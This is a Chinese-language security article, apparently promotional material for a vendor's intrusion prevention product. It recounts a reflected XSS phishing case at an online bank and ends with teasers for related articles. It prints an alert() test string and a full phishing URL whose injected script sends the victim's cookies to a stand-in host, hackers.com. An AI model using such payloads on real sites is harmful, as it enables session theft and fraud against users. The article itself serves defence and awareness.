長URL背後的殺機:網站防範XSS攻擊實錄

XSS(Cross-site scripting)攻擊是最常見的Web攻擊之一,和其它Web攻擊類似的是,XSS也是利用Web頁面編碼的不嚴謹,和SQL注入漏洞所不同的是,XSS漏洞更加難以發現避免。就連McAfee、Symantec、VeriSign這種專業安全公司,也在2008年1月的XEED.com報告中被爆出官網存在XSS漏洞。

此外,XSS攻擊還有另外一個與衆不同的特性:雖然駭客利用的是Web業務系統存在的漏洞,但真正的受害者卻是隨後訪問這些Web系統的用戶。

正是由于以上兩個特性——難以避免、難以察覺,所以想要防禦XSS攻擊非常困難。啓明星辰推出的天清入侵防禦産品,采用基于攻擊手法分析的檢測方法,對Web威脅如SQL注入、XSS攻擊等進行全面檢測和防禦。與傳統的基于數據特征匹配和基于異常模型構建的Web安全相比,有著更低的漏報率和誤報率。

1.網上銀行謹防XSS攻擊

大家都用過網站的搜索功能,提供一個搜索輸入框,用戶在框中輸入想要查找的內容,提交後台數據庫檢索。但如果提交的輸入信息不是字符串,而是一段可執行指令呢?一個很常見的XSS例子,在輸入框中填入「"〉〈SCRIPT〉alert('XSS%20Testing')〈/SCRIPT〉」(不包括最外側的雙引號),一些沒有做嚴格過濾的站點將會彈出一個alert框,顯示「XSS Testing」,這意味著這段腳本已經被執行了。Reflect-based XSS(反射式XSS)利用的就是這樣一個原理。

以下就是一則利用XSS漏洞進行網銀詐騙的真實案例。

小陳是ebank 網上銀行的安全維護人員,有一天忽然接到客服部門轉來的客戶投訴,稱收到一條交易提醒,但該客戶僅做過網上銀行的登錄,並沒有做過付款動作。

「你們給我發了一封郵件,說是有分期付款買筆記本電腦的優惠活動,我就點鏈接進來看,可沒幾分鍾,我就收到交易提醒,說網上付款4784元,請我確認,但我還沒下單呢,你們這是怎麽回事?」電話裏客戶的聲音明顯帶著壓抑不住的憤怒。

經過確認,該客戶使用的PC並不存在病毒,而且也的確是僅點擊了廣告郵件的鏈接而已。「那你把這封郵件發給我看看吧」,小陳在排除了其它可能性後,這麽告訴客戶,「分析出結果我們的客服人員將第一時間通知您,您現在的這筆費用我們先凍結,待解決後給您恢複」。

在收到客戶轉發來的郵件後,小陳第一眼就看出了問題,這不是ebank的系統郵件,而是一封釣魚郵件,僞造了發件人名稱的釣魚郵件。其中關于促銷優惠活動的頁面都是截取了真實活動頁面,但在「點擊參加活動」的按鈕後面,卻隱藏著重重的殺機。

這個鏈接並非是正常促銷活動所在的頁面,而是如下所示的一個長URL

〈a href="http://www.ebank.com/query.asp?word=%3Cscript%3Evar+img+%3D+new+Image%28%29%3Bimg.src%3D%22http%3A%2F%2Fwww.hackers.com%2F%3F%22%2Bdocument.cookie%3B%3C%2Fscript%3E+"〉點擊參加活動〈/a〉

一般的用戶在看到URL開頭是正確的網站域名ebank,都不會懷疑郵件的真實性,而駭客正是利用這一心理,精心設置了圈套,利用了Ebank的某個輸入域中存在反射式XSS攻擊漏洞,通過〈script〉標簽注入

「var img = new Image();img.src=「http://www.hackers.com/?」+document.cookie;」這段JavaScript代碼來盜取受害者的Cookie。受害者只要點擊了這個鏈接,在正確的ebank頁面中操作所留下的Cookie信息,都將被駭客獲取,利用這些信息,駭客甚至可以繞過驗證機制。這個案例中該客戶就是被這樣一個長URL欺騙了,好在發現及時,沒有造成財産損失。

小陳拿著分析結果去找信息中心沈主任彙報,而沈主任果然經驗豐富:「先發布網站緊急通知,告知用戶注意不要隨意點擊鏈接,然後迅速找專業安全公司做安全服務,查清問題的根源再說。」並立刻聯系了專業安全廠商啓明星辰的當地銷售人員。

經過安星遠程網站安全檢查服務的檢測,發現ebank的網站存在數個XSS和SQL注入的漏洞,考慮到代碼級修改費時太長,沈主任決定雙管齊下,一方面找開發人員修補現有漏洞,一方面咨詢是否有現成的專業安全産品可以防範XSS攻擊。在對比了數家國內外的安全産品後,啓明星辰天清入侵防禦産品的專業的Web安全防禦能力給沈主任留下了深刻的印象,特別是其采用了攻擊機理分析方式,在防範XSS攻擊和SQL注入方面都有很好的效果。對網銀來說,時間可就是真金白銀,所以沈主任當機立斷先購買一台天清入侵防禦系統,並迅速上線。當小陳嘗試用原來的長URL進行XSS攻擊時,發現天清入侵防禦産品信息報警監視台上已經出現了報警信息並進行了及時的阻斷。

2.相關提示

反射式XSS攻擊的對象如果是網站管理員,那麽整個網站的權限都有可能因此而泄露給駭客。作爲網站的所有者,不能因爲受攻擊者只是普通用戶而對反射式XSS攻擊掉以輕心,采用專業的安全産品或仔細檢查你的所有頁面,既是對用戶負責也保障了自己的安全。而普通用戶也需要加強自身的安全意識:采用擁有反向地址檢查技術的郵件系統,盡量不要點擊過長且包含未知域名的URL,當然,采用一款防反射式XSS攻擊的浏覽器,比如IE8,也是很有必要的。

 
利用PHP編程防範XSS跨站腳本攻擊
  國內不少論壇都存在跨站腳本漏洞,國外也很多這樣的例子,甚至Google也出現過,不過在12月初時修正了。(編者注:關于跨站腳本漏洞攻擊,讀者可參閱《詳解XSS跨站腳本攻擊》)。跨站攻擊很容易就可以構造,而且非常...查看完整版>>利用PHP編程防範XSS跨站腳本攻擊
 
PHP和XSS跨站攻擊
其實這個話題很早就想說說了,發現國內不少PHP站點都有XSS漏洞。今天偶然看到PHP5的一個XSS漏洞,在此小結一下。順便提醒,使用PHP5的朋友最好打下補丁,或者升級一下。如果你不懂什麽是XSS,可以看這裏,或者這裏(...查看完整版>>PHP和XSS跨站攻擊
 
PHP和XSS跨站攻擊
PHP和XSS跨站攻擊 PHP和XSS跨站攻擊 其實這個話題很早就想說說了,發現國內不少PHP站點都有XSS漏洞。今天偶然看到PHP5的一個XSS漏洞,在此小結一下。順便提醒,使用PHP5的朋友最好打下補丁,或者升級一下。如...查看完整版>>PHP和XSS跨站攻擊
 
揭秘政府網站遭黑客攻擊背後的“産業鏈”
  範東東、文超兩名僅有初中學曆的90後,因非法侵入最高人民檢察院反渎職侵權廳網站後台、非法控制長沙質量技術監督局等十多家政府網站,構成非法侵入計算機信息系統罪、非法控制計算機信息系統罪,最近被北京市朝...查看完整版>>揭秘政府網站遭黑客攻擊背後的“産業鏈”
 
PHP和XSS跨站攻擊
其實這個話題很早就想說說了,發現國內不少PHP站點都有XSS漏洞。今天偶然看到PHP5的,在此小結一下。順便提醒,使用PHP5的朋友最好打下補丁,或者升級一下。如果你不懂什麽是XSS,可以看(中文的也許會好懂一些)。國...查看完整版>>PHP和XSS跨站攻擊